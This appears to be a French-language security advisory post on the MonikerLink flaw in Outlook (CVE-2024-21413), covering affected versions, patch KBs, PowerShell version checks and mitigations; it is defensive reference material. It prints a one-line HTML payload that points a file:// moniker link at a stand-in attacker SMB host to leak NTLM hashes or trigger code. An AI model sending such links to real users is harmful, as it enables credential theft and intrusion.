MonikerLink (Outlook) : un clic suffit, sans même ouvrir la pièce jointe

Le contexte

Découverte par Haifei Li (Check Point Research) en 2023 et patchée par Microsoft le 13 février 2024 (Patch Tuesday), MonikerLink est l'une de ces failles qui rappellent que « lire un mail » n'est jamais une opération aussi inoffensive qu'elle en a l'air.

L'astuce : un lien file:// particulier - un moniker COM - embarqué dans un message Outlook, qui contourne la Protected View censée justement protéger les utilisateurs des contenus hostiles.

Le payload, en une ligne

<a href="file:///\\attacker.com\share\file.rtf!">cliquez ici</a>

L'exclamation ! à la fin transforme un simple lien file:// en moniker COM - Windows tente alors de résoudre l'objet côté distant. Conséquences :

1. Fuite d'authentification NTLM : si l'authentification SMB est autorisée vers Internet (ce qui ne devrait jamais arriver, mais arrive), le hash NTLMv2 de l'utilisateur connecté est envoyé à l'attaquant. Crackable hors-ligne ou utilisable en relay attack.
2. Exécution de code distant : selon le type de fichier (notamment .rtf), le rendu côté Outlook contourne Protected View et peut déclencher du code embarqué sans que l'utilisateur n'ouvre explicitement la pièce jointe.

Le tout : depuis un mail. Sans pièce jointe. Sans bouton "activer le contenu". Juste un clic sur un lien (et dans certains scénarios, même pas - l'aperçu suffit selon la configuration).

Pré-conditions

• Outlook 2016, 2019, 2021, ou Microsoft 365 Apps for Enterprise.
• Le client doit pouvoir résoudre l'URL \\attacker.com\… - donc soit un partage SMB ouvert vers l'Internet (rare en entreprise saine, fréquent ailleurs), soit un nom relayé via DNS interne compromis.

Patch

Microsoft pousse le correctif via les mises à jour de février 2024. Les KB concernées :

• Outlook 2016 : KB5002543
• Outlook 2019 : KB5002545
• Microsoft 365 Apps : version 16.0.17328.20068 ou ultérieure

Vérification rapide :

# Version d'Outlook installée
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Office\ClickToRun\Configuration" -Name VersionToReport

# Sur un poste isolé :
(Get-Item "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE").VersionInfo.ProductVersion

Compléter par les mesures classiques :

• Bloquer SMB sortant au pare-feu de périmètre (TCP 445).
• Bloquer NTLM sortant via stratégie de groupe - surtout si vous avez encore des utilisateurs hors-domaine.
• Désactiver l'aperçu des messages dans Outlook pour les boîtes sensibles.

PoC

Check Point a publié une démonstration vidéo dans son article de recherche. La chaîne d'exploitation est reproductible avec un serveur SMB de test (impacket-smbserver) et un mail crafté à la main - accessible à n'importe quel red teamer junior.

Pourquoi cette CVE compte

Elle illustre une lignée de failles « moniker » qui n'a jamais vraiment été tarie : CVE-2023-23397 (Outlook NTLM via réunion calendrier), CVE-2023-35636 (Outlook + .msg), puis CVE-2024-21413. À chaque fois, un parseur Outlook tente un peu trop d'être malin et expose une primitive d'exécution distante.

À retenir :

• Patcher Outlook n'est jamais facultatif, même si "ça marche".

• Le périmètre sortant (SMB, NTLM) est aussi important que le périmètre entrant.

• Surveillez les nouvelles CVE Microsoft Outlook à chaque Patch Tuesday - c'est une cible récurrente pour les acteurs étatiques.

• Kreomnis